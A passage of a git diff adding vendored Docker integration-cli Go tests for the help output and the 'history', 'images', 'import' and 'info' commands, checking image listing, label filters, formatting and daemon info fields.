strings.Split(cmd+" --help", " ") + + // Check the full usage text + helpCmd := exec.Command(dockerBinary, args...) + helpCmd.Env = newEnvs + out, stderr, _, err := runCommandWithStdoutStderr(helpCmd) + if len(stderr) != 0 { + return fmt.Errorf("Error on %q help. non-empty stderr:%q\n", cmd, stderr) + } + if strings.HasSuffix(out, "\n\n") { + return fmt.Errorf("Should not have blank line on %q\n", cmd) + } + if !strings.Contains(out, "--help") { + return fmt.Errorf("All commands should mention '--help'. 
Command '%v' did not.\n", cmd) + } + + if err != nil { + return fmt.Errorf(out) + } + + // Check each line for lots of stuff + lines := strings.Split(out, "\n") + for _, line := range lines { + i := strings.Index(line, "~") + if i >= 0 && i != len(line)-1 && line[i+1] != '/' { + return fmt.Errorf("Help for %q should not have used ~:\n%s", cmd, line) + } + + // If a line starts with 4 spaces then assume someone + // added a multi-line description for an option and we need + // to flag it + if strings.HasPrefix(line, " ") && + !strings.HasPrefix(strings.TrimLeft(line, " "), "--") { + return fmt.Errorf("Help for %q should not have a multi-line option", cmd) + } + + // Options should NOT end with a period + if strings.HasPrefix(line, " -") && strings.HasSuffix(line, ".") { + return fmt.Errorf("Help for %q should not end with a period: %s", cmd, line) + } + + // Options should NOT end with a space + if strings.HasSuffix(line, " ") { + return fmt.Errorf("Help for %q should not end with a space: %s", cmd, line) + } + + } + + // For each command make sure we generate an error + // if we give a bad arg + args = strings.Split(cmd+" --badArg", " ") + + out, _, err = dockerCmdWithError(args...) + if err == nil { + return fmt.Errorf(out) + } + + // Be really picky + if strings.HasSuffix(stderr, "\n\n") { + return fmt.Errorf("Should not have a blank line at the end of 'docker rm'\n") + } + + // Now make sure that each command will print a short-usage + // (not a full usage - meaning no opts section) if we + // are missing a required arg or pass in a bad arg + + // These commands will never print a short-usage so don't test + noShortUsage := map[string]string{ + "images": "", + "login": "", + "logout": "", + "network": "", + "stats": "", + "volume create": "", + } + + if _, ok := noShortUsage[cmd]; !ok { + // skipNoArgs are ones that we don't want to try w/o + // any args. Either because it'll hang the test or + // lead to incorrect test result (like false negative). 
+ // Whatever the reason, skip trying to run w/o args and + // jump to trying with a bogus arg. + skipNoArgs := map[string]struct{}{ + "daemon": {}, + "events": {}, + "load": {}, + } + + var result *icmd.Result + if _, ok := skipNoArgs[cmd]; !ok { + result = dockerCmdWithResult(strings.Split(cmd, " ")...) + } + + // If its ok w/o any args then try again with an arg + if result == nil || result.ExitCode == 0 { + result = dockerCmdWithResult(strings.Split(cmd+" badArg", " ")...) + } + + if err := result.Compare(icmd.Expected{ + Out: icmd.None, + Err: "\nUsage:", + ExitCode: 1, + }); err != nil { + return err + } + + stderr := result.Stderr() + // Shouldn't have full usage + if strings.Contains(stderr, "--help=false") { + return fmt.Errorf("Should not have full usage on %q:%v", result.Cmd.Args, stderr) + } + if strings.HasSuffix(stderr, "\n\n") { + return fmt.Errorf("Should not have a blank line on %q\n%v", result.Cmd.Args, stderr) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go new file mode 100644 index 0000000000..9979080b1c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go @@ -0,0 +1,121 @@ +package main + +import ( + "fmt" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// This is a heisen-test. Because the created timestamp of images and the behavior of +// sort is not predictable it doesn't always fail. 
+func (s *DockerSuite) TestBuildHistory(c *check.C) { + name := "testbuildhistory" + _, err := buildImage(name, `FROM `+minimalBaseImage()+` +LABEL label.A="A" +LABEL label.B="B" +LABEL label.C="C" +LABEL label.D="D" +LABEL label.E="E" +LABEL label.F="F" +LABEL label.G="G" +LABEL label.H="H" +LABEL label.I="I" +LABEL label.J="J" +LABEL label.K="K" +LABEL label.L="L" +LABEL label.M="M" +LABEL label.N="N" +LABEL label.O="O" +LABEL label.P="P" +LABEL label.Q="Q" +LABEL label.R="R" +LABEL label.S="S" +LABEL label.T="T" +LABEL label.U="U" +LABEL label.V="V" +LABEL label.W="W" +LABEL label.X="X" +LABEL label.Y="Y" +LABEL label.Z="Z"`, + true) + + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "history", "testbuildhistory") + actualValues := strings.Split(out, "\n")[1:27] + expectedValues := [26]string{"Z", "Y", "X", "W", "V", "U", "T", "S", "R", "Q", "P", "O", "N", "M", "L", "K", "J", "I", "H", "G", "F", "E", "D", "C", "B", "A"} + + for i := 0; i < 26; i++ { + echoValue := fmt.Sprintf("LABEL label.%s=%s", expectedValues[i], expectedValues[i]) + actualValue := actualValues[i] + c.Assert(actualValue, checker.Contains, echoValue) + } + +} + +func (s *DockerSuite) TestHistoryExistentImage(c *check.C) { + dockerCmd(c, "history", "busybox") +} + +func (s *DockerSuite) TestHistoryNonExistentImage(c *check.C) { + _, _, err := dockerCmdWithError("history", "testHistoryNonExistentImage") + c.Assert(err, checker.NotNil, check.Commentf("history on a non-existent image should fail.")) +} + +func (s *DockerSuite) TestHistoryImageWithComment(c *check.C) { + name := "testhistoryimagewithcomment" + + // make an image through docker commit [ -m messages ] + + dockerCmd(c, "run", "--name", name, "busybox", "true") + dockerCmd(c, "wait", name) + + comment := "This_is_a_comment" + dockerCmd(c, "commit", "-m="+comment, name, name) + + // test docker history to check comment messages + + out, _ := dockerCmd(c, "history", name) + outputTabs := strings.Fields(strings.Split(out, 
"\n")[1]) + actualValue := outputTabs[len(outputTabs)-1] + c.Assert(actualValue, checker.Contains, comment) +} + +func (s *DockerSuite) TestHistoryHumanOptionFalse(c *check.C) { + out, _ := dockerCmd(c, "history", "--human=false", "busybox") + lines := strings.Split(out, "\n") + sizeColumnRegex, _ := regexp.Compile("SIZE +") + indices := sizeColumnRegex.FindStringIndex(lines[0]) + startIndex := indices[0] + endIndex := indices[1] + for i := 1; i < len(lines)-1; i++ { + if endIndex > len(lines[i]) { + endIndex = len(lines[i]) + } + sizeString := lines[i][startIndex:endIndex] + + _, err := strconv.Atoi(strings.TrimSpace(sizeString)) + c.Assert(err, checker.IsNil, check.Commentf("The size '%s' was not an Integer", sizeString)) + } +} + +func (s *DockerSuite) TestHistoryHumanOptionTrue(c *check.C) { + out, _ := dockerCmd(c, "history", "--human=true", "busybox") + lines := strings.Split(out, "\n") + sizeColumnRegex, _ := regexp.Compile("SIZE +") + humanSizeRegexRaw := "\\d+.*B" // Matches human sizes like 10 MB, 3.2 KB, etc + indices := sizeColumnRegex.FindStringIndex(lines[0]) + startIndex := indices[0] + endIndex := indices[1] + for i := 1; i < len(lines)-1; i++ { + if endIndex > len(lines[i]) { + endIndex = len(lines[i]) + } + sizeString := lines[i][startIndex:endIndex] + c.Assert(strings.TrimSpace(sizeString), checker.Matches, humanSizeRegexRaw, check.Commentf("The size '%s' was not in human format", sizeString)) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go new file mode 100644 index 0000000000..3b678a2586 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go @@ -0,0 +1,364 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "sort" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + 
"github.com/go-check/check" +) + +func (s *DockerSuite) TestImagesEnsureImageIsListed(c *check.C) { + imagesOut, _ := dockerCmd(c, "images") + c.Assert(imagesOut, checker.Contains, "busybox") +} + +func (s *DockerSuite) TestImagesEnsureImageWithTagIsListed(c *check.C) { + name := "imagewithtag" + dockerCmd(c, "tag", "busybox", name+":v1") + dockerCmd(c, "tag", "busybox", name+":v1v1") + dockerCmd(c, "tag", "busybox", name+":v2") + + imagesOut, _ := dockerCmd(c, "images", name+":v1") + c.Assert(imagesOut, checker.Contains, name) + c.Assert(imagesOut, checker.Contains, "v1") + c.Assert(imagesOut, checker.Not(checker.Contains), "v2") + c.Assert(imagesOut, checker.Not(checker.Contains), "v1v1") + + imagesOut, _ = dockerCmd(c, "images", name) + c.Assert(imagesOut, checker.Contains, name) + c.Assert(imagesOut, checker.Contains, "v1") + c.Assert(imagesOut, checker.Contains, "v1v1") + c.Assert(imagesOut, checker.Contains, "v2") +} + +func (s *DockerSuite) TestImagesEnsureImageWithBadTagIsNotListed(c *check.C) { + imagesOut, _ := dockerCmd(c, "images", "busybox:nonexistent") + c.Assert(imagesOut, checker.Not(checker.Contains), "busybox") +} + +func (s *DockerSuite) TestImagesOrderedByCreationDate(c *check.C) { + id1, err := buildImage("order:test_a", + `FROM busybox + MAINTAINER dockerio1`, true) + c.Assert(err, checker.IsNil) + time.Sleep(1 * time.Second) + id2, err := buildImage("order:test_c", + `FROM busybox + MAINTAINER dockerio2`, true) + c.Assert(err, checker.IsNil) + time.Sleep(1 * time.Second) + id3, err := buildImage("order:test_b", + `FROM busybox + MAINTAINER dockerio3`, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc") + imgs := strings.Split(out, "\n") + c.Assert(imgs[0], checker.Equals, id3, check.Commentf("First image must be %s, got %s", id3, imgs[0])) + c.Assert(imgs[1], checker.Equals, id2, check.Commentf("First image must be %s, got %s", id2, imgs[1])) + c.Assert(imgs[2], checker.Equals, id1, 
check.Commentf("First image must be %s, got %s", id1, imgs[2])) +} + +func (s *DockerSuite) TestImagesErrorWithInvalidFilterNameTest(c *check.C) { + out, _, err := dockerCmdWithError("images", "-f", "FOO=123") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) { + imageName1 := "images_filter_test1" + imageName2 := "images_filter_test2" + imageName3 := "images_filter_test3" + image1ID, err := buildImage(imageName1, + `FROM busybox + LABEL match me`, true) + c.Assert(err, check.IsNil) + + image2ID, err := buildImage(imageName2, + `FROM busybox + LABEL match="me too"`, true) + c.Assert(err, check.IsNil) + + image3ID, err := buildImage(imageName3, + `FROM busybox + LABEL nomatch me`, true) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match") + out = strings.TrimSpace(out) + c.Assert(out, check.Matches, fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image1ID)) + c.Assert(out, check.Matches, fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image2ID)) + c.Assert(out, check.Not(check.Matches), fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image3ID)) + + out, _ = dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match=me too") + out = strings.TrimSpace(out) + c.Assert(out, check.Equals, image2ID) +} + +// Regression : #15659 +func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) { + // Create a container + dockerCmd(c, "run", "--name", "bar", "busybox", "/bin/sh") + // Commit with labels "using changes" + out, _ := dockerCmd(c, "commit", "-c", "LABEL foo.version=1.0.0-1", "-c", "LABEL foo.name=bar", "-c", "LABEL foo.author=starlord", "bar", "bar:1.0.0-1") + imageID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=foo.version=1.0.0-1") + out = strings.TrimSpace(out) + c.Assert(out, check.Equals, imageID) +} + +func (s *DockerSuite) TestImagesFilterSinceAndBefore(c *check.C) { + imageID1, 
err := buildImage("image:1", `FROM `+minimalBaseImage()+` +LABEL number=1`, true) + c.Assert(err, checker.IsNil) + imageID2, err := buildImage("image:2", `FROM `+minimalBaseImage()+` +LABEL number=2`, true) + c.Assert(err, checker.IsNil) + imageID3, err := buildImage("image:3", `FROM `+minimalBaseImage()+` +LABEL number=3`, true) + c.Assert(err, checker.IsNil) + + expected := []string{imageID3, imageID2} + + out, _ := dockerCmd(c, "images", "-f", "since=image:1", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "since="+imageID1, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + expected = []string{imageID3} + + out, _ = dockerCmd(c, "images", "-f", "since=image:2", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "since="+imageID2, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + expected = []string{imageID2, imageID1} + + out, _ = dockerCmd(c, "images", "-f", "before=image:3", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "before="+imageID3, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + expected = []string{imageID1} + + out, _ = dockerCmd(c, "images", "-f", "before=image:2", "image") + c.Assert(assertImageList(out, 
expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "before="+imageID2, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) +} + +func assertImageList(out string, expected []string) bool { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + + if len(lines)-1 != len(expected) { + return false + } + + imageIDIndex := strings.Index(lines[0], "IMAGE ID") + for i := 0; i < len(expected); i++ { + imageID := lines[i+1][imageIDIndex : imageIDIndex+12] + found := false + for _, e := range expected { + if imageID == e[7:19] { + found = true + break + } + } + if !found { + return false + } + } + + return true +} + +func (s *DockerSuite) TestImagesFilterSpaceTrimCase(c *check.C) { + imageName := "images_filter_test" + buildImage(imageName, + `FROM busybox + RUN touch /test/foo + RUN touch /test/bar + RUN touch /test/baz`, true) + + filters := []string{ + "dangling=true", + "Dangling=true", + " dangling=true", + "dangling=true ", + "dangling = true", + } + + imageListings := make([][]string, 5, 5) + for idx, filter := range filters { + out, _ := dockerCmd(c, "images", "-q", "-f", filter) + listing := strings.Split(out, "\n") + sort.Strings(listing) + imageListings[idx] = listing + } + + for idx, listing := range imageListings { + if idx < 4 && !reflect.DeepEqual(listing, imageListings[idx+1]) { + for idx, errListing := range imageListings { + fmt.Printf("out %d\n", idx) + for _, image := range errListing { + fmt.Print(image) + } + fmt.Print("") + } + c.Fatalf("All output must be the same") + } + } +} + +func (s *DockerSuite) TestImagesEnsureDanglingImageOnlyListedOnce(c *check.C) { + testRequires(c, DaemonIsLinux) + // create container 1 + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + containerID1 := strings.TrimSpace(out) + + 
// tag as foobox + out, _ = dockerCmd(c, "commit", containerID1, "foobox") + imageID := stringid.TruncateID(strings.TrimSpace(out)) + + // overwrite the tag, making the previous image dangling + dockerCmd(c, "tag", "busybox", "foobox") + + out, _ = dockerCmd(c, "images", "-q", "-f", "dangling=true") + // Expect one dangling image + c.Assert(strings.Count(out, imageID), checker.Equals, 1) + + out, _ = dockerCmd(c, "images", "-q", "-f", "dangling=false") + //dangling=false would not include dangling images + c.Assert(out, checker.Not(checker.Contains), imageID) + + out, _ = dockerCmd(c, "images") + //docker images still include dangling images + c.Assert(out, checker.Contains, imageID) + +} + +func (s *DockerSuite) TestImagesWithIncorrectFilter(c *check.C) { + out, _, err := dockerCmdWithError("images", "-f", "dangling=invalid") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestImagesEnsureOnlyHeadsImagesShown(c *check.C) { + dockerfile := ` + FROM busybox + MAINTAINER docker + ENV foo bar` + + head, out, err := buildImageWithOut("scratch-image", dockerfile, false) + c.Assert(err, check.IsNil) + + // this is just the output of docker build + // we're interested in getting the image id of the MAINTAINER instruction + // and that's located at output, line 5, from 7 to end + split := strings.Split(out, "\n") + intermediate := strings.TrimSpace(split[5][7:]) + + out, _ = dockerCmd(c, "images") + // images shouldn't show non-heads images + c.Assert(out, checker.Not(checker.Contains), intermediate) + // images should contain final built images + c.Assert(out, checker.Contains, stringid.TruncateID(head)) +} + +func (s *DockerSuite) TestImagesEnsureImagesFromScratchShown(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support FROM scratch + + dockerfile := ` + FROM scratch + MAINTAINER docker` + + id, _, err := buildImageWithOut("scratch-image", dockerfile, false) + c.Assert(err, check.IsNil) 
+ + out, _ := dockerCmd(c, "images") + // images should contain images built from scratch + c.Assert(out, checker.Contains, stringid.TruncateID(id)) +} + +// For W2W - equivalent to TestImagesEnsureImagesFromScratchShown but Windows +// doesn't support from scratch +func (s *DockerSuite) TestImagesEnsureImagesFromBusyboxShown(c *check.C) { + dockerfile := ` + FROM busybox + MAINTAINER docker` + + id, _, err := buildImageWithOut("busybox-image", dockerfile, false) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "images") + // images should contain images built from busybox + c.Assert(out, checker.Contains, stringid.TruncateID(id)) +} + +// #18181 +func (s *DockerSuite) TestImagesFilterNameWithPort(c *check.C) { + tag := "a.b.c.d:5000/hello" + dockerCmd(c, "tag", "busybox", tag) + out, _ := dockerCmd(c, "images", tag) + c.Assert(out, checker.Contains, tag) + + out, _ = dockerCmd(c, "images", tag+":latest") + c.Assert(out, checker.Contains, tag) + + out, _ = dockerCmd(c, "images", tag+":no-such-tag") + c.Assert(out, checker.Not(checker.Contains), tag) +} + +func (s *DockerSuite) TestImagesFormat(c *check.C) { + // testRequires(c, DaemonIsLinux) + tag := "myimage" + dockerCmd(c, "tag", "busybox", tag+":v1") + dockerCmd(c, "tag", "busybox", tag+":v2") + + out, _ := dockerCmd(c, "images", "--format", "{{.Repository}}", tag) + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"myimage", "myimage"} + var names []string + names = append(names, lines...) 
+ c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +// ImagesDefaultFormatAndQuiet +func (s *DockerSuite) TestImagesFormatDefaultFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + + // create container 1 + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + containerID1 := strings.TrimSpace(out) + + // tag as foobox + out, _ = dockerCmd(c, "commit", containerID1, "myimage") + imageID := stringid.TruncateID(strings.TrimSpace(out)) + + config := `{ + "imagesFormat": "{{ .ID }} default" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "--config", d, "images", "-q", "myimage") + c.Assert(out, checker.Equals, imageID+"\n", check.Commentf("Expected to print only the image id, got %v\n", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go new file mode 100644 index 0000000000..57dc2a6698 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go @@ -0,0 +1,150 @@ +package main + +import ( + "bufio" + "compress/gzip" + "io/ioutil" + "os" + "os/exec" + "regexp" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestImportDisplay(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + cleanedContainerID := strings.TrimSpace(out) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "export", cleanedContainerID), + exec.Command(dockerBinary, "import", "-"), + ) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Count, "\n", 1, 
check.Commentf("display is expected 1 '\\n' but didn't")) + + image := strings.TrimSpace(out) + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing.")) +} + +func (s *DockerSuite) TestImportBadURL(c *check.C) { + out, _, err := dockerCmdWithError("import", "http://nourl/bad") + c.Assert(err, checker.NotNil, check.Commentf("import was supposed to fail but didn't")) + // Depending on your system you can get either of these errors + if !strings.Contains(out, "dial tcp") && + !strings.Contains(out, "ApplyLayer exit status 1 stdout: stderr: archive/tar: invalid tar header") && + !strings.Contains(out, "Error processing tar file") { + c.Fatalf("expected an error msg but didn't get one.\nErr: %v\nOut: %v", err, out) + } +} + +func (s *DockerSuite) TestImportFile(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + runCmd := exec.Command(dockerBinary, "export", "test-import") + runCmd.Stdout = bufio.NewWriter(temporaryFile) + + _, err = runCommand(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + + out, _ := dockerCmd(c, "import", temporaryFile.Name()) + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + image := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing.")) +} + +func (s *DockerSuite) TestImportGzipped(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, 
check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + runCmd := exec.Command(dockerBinary, "export", "test-import") + w := gzip.NewWriter(temporaryFile) + runCmd.Stdout = w + + _, err = runCommand(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + err = w.Close() + c.Assert(err, checker.IsNil, check.Commentf("failed to close gzip writer")) + temporaryFile.Close() + out, _ := dockerCmd(c, "import", temporaryFile.Name()) + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + image := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing.")) +} + +func (s *DockerSuite) TestImportFileWithMessage(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + runCmd := exec.Command(dockerBinary, "export", "test-import") + runCmd.Stdout = bufio.NewWriter(temporaryFile) + + _, err = runCommand(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + + message := "Testing commit message" + out, _ := dockerCmd(c, "import", "-m", message, temporaryFile.Name()) + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + image := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "history", image) + split := strings.Split(out, "\n") + + c.Assert(split, checker.HasLen, 3, check.Commentf("expected 3 lines from image history")) + r := regexp.MustCompile("[\\s]{2,}") + split = r.Split(split[1], -1) + + c.Assert(message, checker.Equals, split[3], check.Commentf("didn't get expected value in commit message")) + + out, _ = dockerCmd(c, "run", 
"--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing")) +} + +func (s *DockerSuite) TestImportFileNonExistentFile(c *check.C) { + _, _, err := dockerCmdWithError("import", "example.com/myImage.tar") + c.Assert(err, checker.NotNil, check.Commentf("import non-existing file must failed")) +} + +func (s *DockerSuite) TestImportWithQuotedChanges(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + result := icmd.RunCmd(icmd.Cmd{ + Command: binaryWithArgs("export", "test-import"), + Stdout: bufio.NewWriter(temporaryFile), + }) + c.Assert(result, icmd.Matches, icmd.Success) + + result = dockerCmdWithResult("import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name()) + c.Assert(result, icmd.Matches, icmd.Success) + image := strings.TrimSpace(result.Stdout()) + + result = dockerCmdWithResult("run", "--rm", image, "true") + c.Assert(result, icmd.Matches, icmd.Expected{Out: icmd.None}) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go new file mode 100644 index 0000000000..62ce7e22f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go @@ -0,0 +1,234 @@ +package main + +import ( + "encoding/json" + "fmt" + "net" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// ensure docker info succeeds +func (s *DockerSuite) TestInfoEnsureSucceeds(c *check.C) { + out, _ := dockerCmd(c, "info") + + // always shown fields + stringsToCheck := []string{ + "ID:", + "Containers:", + " Running:", + " Paused:", + " Stopped:", + "Images:", + "OSType:", + "Architecture:", + 
"Logging Driver:", + "Operating System:", + "CPUs:", + "Total Memory:", + "Kernel Version:", + "Storage Driver:", + "Volume:", + "Network:", + "Live Restore Enabled:", + } + + if daemonPlatform == "linux" { + stringsToCheck = append(stringsToCheck, "Init Binary:", "Security Options:", "containerd version:", "runc version:", "init version:") + } + + if DaemonIsLinux.Condition() { + stringsToCheck = append(stringsToCheck, "Runtimes:", "Default Runtime: runc") + } + + if experimentalDaemon { + stringsToCheck = append(stringsToCheck, "Experimental: true") + } else { + stringsToCheck = append(stringsToCheck, "Experimental: false") + } + + for _, linePrefix := range stringsToCheck { + c.Assert(out, checker.Contains, linePrefix, check.Commentf("couldn't find string %v in output", linePrefix)) + } +} + +// TestInfoFormat tests `docker info --format` +func (s *DockerSuite) TestInfoFormat(c *check.C) { + out, status := dockerCmd(c, "info", "--format", "{{json .}}") + c.Assert(status, checker.Equals, 0) + var m map[string]interface{} + err := json.Unmarshal([]byte(out), &m) + c.Assert(err, checker.IsNil) + _, _, err = dockerCmdWithError("info", "--format", "{{.badString}}") + c.Assert(err, checker.NotNil) +} + +// TestInfoDiscoveryBackend verifies that a daemon run with `--cluster-advertise` and +// `--cluster-store` properly show the backend's endpoint in info output. 
+func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + d := NewDaemon(c) + discoveryBackend := "consul://consuladdr:consulport/some/path" + discoveryAdvertise := "1.1.1.1:2375" + err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise)) + c.Assert(err, checker.IsNil) + defer d.Stop() + + out, err := d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: %s\n", discoveryBackend)) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: %s\n", discoveryAdvertise)) +} + +// TestInfoDiscoveryInvalidAdvertise verifies that a daemon run with +// an invalid `--cluster-advertise` configuration +func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + d := NewDaemon(c) + discoveryBackend := "consul://consuladdr:consulport/some/path" + + // --cluster-advertise with an invalid string is an error + err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid") + c.Assert(err, checker.Not(checker.IsNil)) + + // --cluster-advertise without --cluster-store is also an error + err = d.Start("--cluster-advertise=1.1.1.1:2375") + c.Assert(err, checker.Not(checker.IsNil)) +} + +// TestInfoDiscoveryAdvertiseInterfaceName verifies that a daemon run with `--cluster-advertise` +// configured with interface name properly show the advertise ip-address in info output. 
+func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) { + testRequires(c, SameHostDaemon, Network, DaemonIsLinux) + + d := NewDaemon(c) + discoveryBackend := "consul://consuladdr:consulport/some/path" + discoveryAdvertise := "eth0" + + err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise)) + c.Assert(err, checker.IsNil) + defer d.Stop() + + iface, err := net.InterfaceByName(discoveryAdvertise) + c.Assert(err, checker.IsNil) + addrs, err := iface.Addrs() + c.Assert(err, checker.IsNil) + c.Assert(len(addrs), checker.GreaterThan, 0) + ip, _, err := net.ParseCIDR(addrs[0].String()) + c.Assert(err, checker.IsNil) + + out, err := d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: %s\n", discoveryBackend)) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: %s:2375\n", ip.String())) +} + +func (s *DockerSuite) TestInfoDisplaysRunningContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "run", "-d", "busybox", "top") + out, _ := dockerCmd(c, "info") + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) 